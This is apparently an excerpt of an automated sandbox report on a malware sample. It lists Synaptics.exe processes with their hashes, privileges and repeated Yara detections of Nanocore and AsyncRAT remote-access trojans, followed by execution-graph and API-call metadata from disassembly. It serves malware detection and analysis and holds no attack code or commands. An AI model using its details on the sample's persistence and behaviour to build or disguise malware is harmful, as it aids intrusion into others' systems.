                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000002.526573354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.383936753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.381548795.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.375965168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000000.382444300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:21
                                                  Start time:02:40:17
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Imagebase:0xe40000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.387756997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.389965974.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.386302469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000002.401565081.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.381765881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.380393313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.384393929.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.382689406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  General

                                                  Target ID:23
                                                  Start time:02:40:21
                                                  Start date:26/01/2022
                                                  Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\ProgramData\Synaptics\Synaptics.exe
                                                  Imagebase:0x8b0000
                                                  File size:2083328 bytes
                                                  MD5 hash:BFF363A92AC43FF249652A83DADC02AB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.392515313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.396965179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.390367257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.388606290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.403730358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000002.422072691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.400267484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:13%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:121
                                                    Total number of Limit Nodes:6
                                                    execution_graph 16808 fcfef8 SetWindowLongW 16809 fcff6c 16808->16809 16933 fc9168 16937 fc924f 16933->16937 16942 fc9260 16933->16942 16934 fc9177 16938 fc9273 16937->16938 16939 fc9283 16938->16939 16947 fc98f0 16938->16947 16951 fc98e0 16938->16951 16939->16934 16943 fc9273 16942->16943 16944 fc9283 16943->16944 16945 fc98f0 LoadLibraryExW 16943->16945 16946 fc98e0 LoadLibraryExW 16943->16946 16944->16934 16945->16944 16946->16944 16948 fc9904 16947->16948 16949 fc9929 16948->16949 16955 fc9450 16948->16955 16949->16939 16952 fc9904 16951->16952 16953 fc9929 16952->16953 16954 fc9450 LoadLibraryExW 16952->16954 16953->16939 16954->16953 16957 fc9ad0 LoadLibraryExW 16955->16957 16958 fc9b49 16957->16958 16958->16949 16959 fc9848 16960 fc988a 16959->16960 16961 fc9890 GetModuleHandleW 16959->16961 16960->16961 16962 fc98bd 16961->16962 16810 fc40d0 16811 fc40da 16810->16811 16815 fc41c1 16810->16815 16820 fc3c64 16811->16820 16813 fc40f5 16816 fc41e5 16815->16816 16824 fc42c0 16816->16824 16828 fc42b1 16816->16828 16821 fc3c6f 16820->16821 16822 fc69dd 16821->16822 16836 fc5184 16821->16836 16822->16813 16826 fc42e7 16824->16826 16825 fc43c4 16825->16825 16826->16825 16832 fc3de4 16826->16832 16830 fc42e7 16828->16830 16829 fc43c4 16829->16829 16830->16829 16831 fc3de4 CreateActCtxA 16830->16831 16831->16829 16833 fc5350 CreateActCtxA 16832->16833 16835 fc5413 16833->16835 16837 fc518f 16836->16837 16840 fc57d8 16837->16840 16839 fc6a7d 16839->16822 16841 fc57e3 16840->16841 16844 fc5808 16841->16844 16843 fc6b5a 16843->16839 16845 fc5813 16844->16845 16848 fc5838 16845->16848 16847 fc6c4a 16847->16843 16850 fc5843 16848->16850 16849 fc739c 16849->16847 16850->16849 16853 fcb280 16850->16853 16858 fcb270 16850->16858 16854 fcb2a1 16853->16854 16855 fcb2c5 16854->16855 16863 fcb538 16854->16863 16867 fcb528 16854->16867 16855->16849 16859 fcb2a1 16858->16859 16860 fcb2c5 16859->16860 16861 fcb538 2 API calls 16859->16861 16862 fcb528 2 API calls 16859->16862 16860->16849 16861->16860 16862->16860 16864 fcb545 16863->16864 16866 fcb57f 16864->16866 16871 fc9750 16864->16871 16866->16855 16868 fcb545 16867->16868 16869 fcb57f 16868->16869 16870 fc9750 2 API calls 16868->16870 16869->16855 16870->16869 16872 fc975b 16871->16872 16874 fcc278 16872->16874 16875 fc9818 16872->16875 16874->16874 16876 fc9823 16875->16876 16877 fc5838 2 API calls 16876->16877 16878 fcc2e7 16876->16878 16877->16878 16882 fce068 16878->16882 16891 fce058 16878->16891 16879 fcc320 16879->16874 16884 fce099 16882->16884 16886 fce18a 16882->16886 16883 fce0a5 16883->16879 16884->16883 16889 fce4e8 LoadLibraryExW 16884->16889 16890 fce4d7 LoadLibraryExW 16884->16890 16885 fce0e5 16887 fceeb0 CreateWindowExW 16885->16887 16888 fceea1 CreateWindowExW 16885->16888 16886->16879 16887->16886 16888->16886 16889->16885 16890->16885 16893 fce099 16891->16893 16894 fce18a 16891->16894 16892 fce0a5 16892->16879 16893->16892 16898 fce4e8 LoadLibraryExW 16893->16898 16899 fce4d7 LoadLibraryExW 16893->16899 16894->16879 16895 fce0e5 16896 fceeb0 CreateWindowExW 16895->16896 16897 fceea1 CreateWindowExW 16895->16897 16896->16894 16897->16894 16898->16895 16899->16895 16900 fcb650 16901 fcb6b6 16900->16901 16905 fcb810 16901->16905 16908 fcb800 16901->16908 16902 fcb765 16912 fc97d8 16905->16912 16909 fcb805 16908->16909 16910 fcb83e 16909->16910 16911 fc97d8 DuplicateHandle 16909->16911 16910->16902 16911->16910 16913 fcb878 DuplicateHandle 16912->16913 16914 fcb83e 16913->16914 16914->16902 16915 5050be8 16916 5050c15 16915->16916 16917 5050c47 16916->16917 16919 5050d70 16916->16919 16921 5050d84 16919->16921 16920 5050e10 16920->16917 16923 5050e28 16921->16923 16924 5050e39 16923->16924 16926 50522c3 16923->16926 16924->16920 16929 50522f0 16926->16929 16930 5052332 16929->16930 16932 50522da 16929->16932 16931 505238a CallWindowProcW 16930->16931 16930->16932 16931->16932 16932->16924

                                                    Executed Functions

                                                    Function 00FCDD70 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 96 fcdd70-fcfd1e 100 fcfd29-fcfd30 96->100 101 fcfd20-fcfd26 96->101 102 fcfd3b-fcfd73 100->102 103 fcfd32-fcfd38 100->103 101->100 104 fcfd7b-fcfdda CreateWindowExW 102->104 103->102 105 fcfddc-fcfde2 104->105 106 fcfde3-fcfe1b 104->106 105->106 110 fcfe1d-fcfe20 106->110 111 fcfe28 106->111 110->111 112 fcfe29 111->112 112->112
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FCFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 64d27c9444c67399f7570bcf10ea97d3a345d50affdb181cff5f59f3740a820f
                                                    • Instruction ID: 74c067561decdeaa31edd7dfa2ba7f0758d2eac6de3e3f5bec05e8ba7f7660de
                                                    • Opcode Fuzzy Hash: 64d27c9444c67399f7570bcf10ea97d3a345d50affdb181cff5f59f3740a820f
                                                    • Instruction Fuzzy Hash: 9D51EFB1C003499FDB15CFA9C984ADEFFB6BF48314F24852AE409AB261D7749849CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FCDD8C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 113 fcdd8c-fcfd1e 115 fcfd29-fcfd30 113->115 116 fcfd20-fcfd26 113->116 117 fcfd3b-fcfdda CreateWindowExW 115->117 118 fcfd32-fcfd38 115->118 116->115 120 fcfddc-fcfde2 117->120 121 fcfde3-fcfe1b 117->121 118->117 120->121 125 fcfe1d-fcfe20 121->125 126 fcfe28 121->126 125->126 127 fcfe29 126->127 127->127
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FCFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: babc3e9e87630d2d802d72f165071d1348af38d5dc855156481ad4a8163f0cd5
                                                    • Instruction ID: 4f39dedc8b95cebbbe6f31cbcfbaf887caee26ef3f53f9b4dcb0a9f32079ec78
                                                    • Opcode Fuzzy Hash: babc3e9e87630d2d802d72f165071d1348af38d5dc855156481ad4a8163f0cd5
                                                    • Instruction Fuzzy Hash: 9951C2B1D003099FDF14CF99D984ADEFBB6BF48314F24852AE819AB250D7749945CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FCFCAC Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 128 fcfcac-fcfd1e 129 fcfd29-fcfd30 128->129 130 fcfd20-fcfd26 128->130 131 fcfd3b-fcfd73 129->131 132 fcfd32-fcfd38 129->132 130->129 133 fcfd7b-fcfdda CreateWindowExW 131->133 132->131 134 fcfddc-fcfde2 133->134 135 fcfde3-fcfe1b 133->135 134->135 139 fcfe1d-fcfe20 135->139 140 fcfe28 135->140 139->140 141 fcfe29 140->141 141->141
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FCFDCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: cffe4ae89c9d277502db9df5b7e37c4007ffb2603d8561cff724bba2f9e3d007
                                                    • Instruction ID: d0a9965c988c30999332695ba762becbb4713dc0f4cb54c09107a766302ffde4
                                                    • Opcode Fuzzy Hash: cffe4ae89c9d277502db9df5b7e37c4007ffb2603d8561cff724bba2f9e3d007
                                                    • Instruction Fuzzy Hash: 6C51D1B1D003099FDF14CFA9D985ADEFBB6BF48310F24862AE419AB250D7749949CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FC5345 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 142 fc5345-fc5411 CreateActCtxA 144 fc541a-fc5474 142->144 145 fc5413-fc5419 142->145 152 fc5476-fc5479 144->152 153 fc5483-fc5487 144->153 145->144 152->153 154 fc5498 153->154 155 fc5489-fc5495 153->155 157 fc5499 154->157 155->154 157->157
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00FC5401
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: f5ae0f991479be9e54cb3c99a922ca220592a9ca4b2836b763a153cc549d2dbe
                                                    • Instruction ID: 53057b62e2ffc9f28b2cb3ab9293ffc1e5a5482075e6d6e58a6f8bde4734aae1
                                                    • Opcode Fuzzy Hash: f5ae0f991479be9e54cb3c99a922ca220592a9ca4b2836b763a153cc549d2dbe
                                                    • Instruction Fuzzy Hash: 1341E371C00619CFDF24CFA9C985BDDBBB5BF49308F248469D448AB251DB71698ACF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FC3DE4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 158 fc3de4-fc5411 CreateActCtxA 161 fc541a-fc5474 158->161 162 fc5413-fc5419 158->162 169 fc5476-fc5479 161->169 170 fc5483-fc5487 161->170 162->161 169->170 171 fc5498 170->171 172 fc5489-fc5495 170->172 174 fc5499 171->174 172->171 174->174
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00FC5401
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: a0abbc1112016a559686c8e3c8434b4ec6c970f4cb19dc0958166316dcc9d4c2
                                                    • Instruction ID: 26b7b73718bbb00e3f86685ac62a9af89eaddcb14b435189a3ff9d56cbf2e259
                                                    • Opcode Fuzzy Hash: a0abbc1112016a559686c8e3c8434b4ec6c970f4cb19dc0958166316dcc9d4c2
                                                    • Instruction Fuzzy Hash: 7A41F471C00619CBDF24CF99C985BCDBBB5FF45708F208469D408AB251D7756986CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 050522F0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 175 50522f0-505232c 176 5052332-5052337 175->176 177 50523dc-50523fc 175->177 178 5052339-5052370 176->178 179 505238a-50523c2 CallWindowProcW 176->179 183 50523ff-505240c 177->183 186 5052372-5052378 178->186 187 5052379-5052388 178->187 180 50523c4-50523ca 179->180 181 50523cb-50523da 179->181 180->181 181->183 186->187 187->183
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 050523B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.341471906.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5050000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 09864eafbaa4b83c10b135b82333588a13bad421adb3cd4b67f3759e5b148fd5
                                                    • Instruction ID: d19b6d492ef59cf93bea74272fdacae67a9935b40b3b03c318f3d79b9aa2f7a9
                                                    • Opcode Fuzzy Hash: 09864eafbaa4b83c10b135b82333588a13bad421adb3cd4b67f3759e5b148fd5
                                                    • Instruction Fuzzy Hash: 2F4148B89002459FDB14CF99D588AAFBBF5FF89324F248459D919AB321D374A841CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FC97D8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 189 fc97d8-fcb90c DuplicateHandle 191 fcb90e-fcb914 189->191 192 fcb915-fcb932 189->192 191->192
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FCB83E,?,?,?,?,?), ref: 00FCB8FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: a0a1e95c12b241dfc5d13b4c3b4ae5c5ce8cf637b25c7ec21158baf0a2a8761b
                                                    • Instruction ID: 7b231a315b2f666c59b502b21b164412bfb5a522170c894c3226fc36f2a9e3b9
                                                    • Opcode Fuzzy Hash: a0a1e95c12b241dfc5d13b4c3b4ae5c5ce8cf637b25c7ec21158baf0a2a8761b
                                                    • Instruction Fuzzy Hash: CD21E6B5900209AFDB10CF99D985BDEBBF8FB48324F14842AE955B3350D374A944DFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FCB873 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 195 fcb873-fcb90c DuplicateHandle 196 fcb90e-fcb914 195->196 197 fcb915-fcb932 195->197 196->197
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FCB83E,?,?,?,?,?), ref: 00FCB8FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 541fec8e0b81d8861fd4397124115bceee2709a577bb3f5a994a54a909c67b31
                                                    • Instruction ID: f17d7997ff4991ffcb521fc8221c7cd40012841d6d8132cf870d106c02a808d4
                                                    • Opcode Fuzzy Hash: 541fec8e0b81d8861fd4397124115bceee2709a577bb3f5a994a54a909c67b31
                                                    • Instruction Fuzzy Hash: C721E4B5D01209AFDB10CFA9D985ADEBBF4EB48324F14842AE959A3310D374A945CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

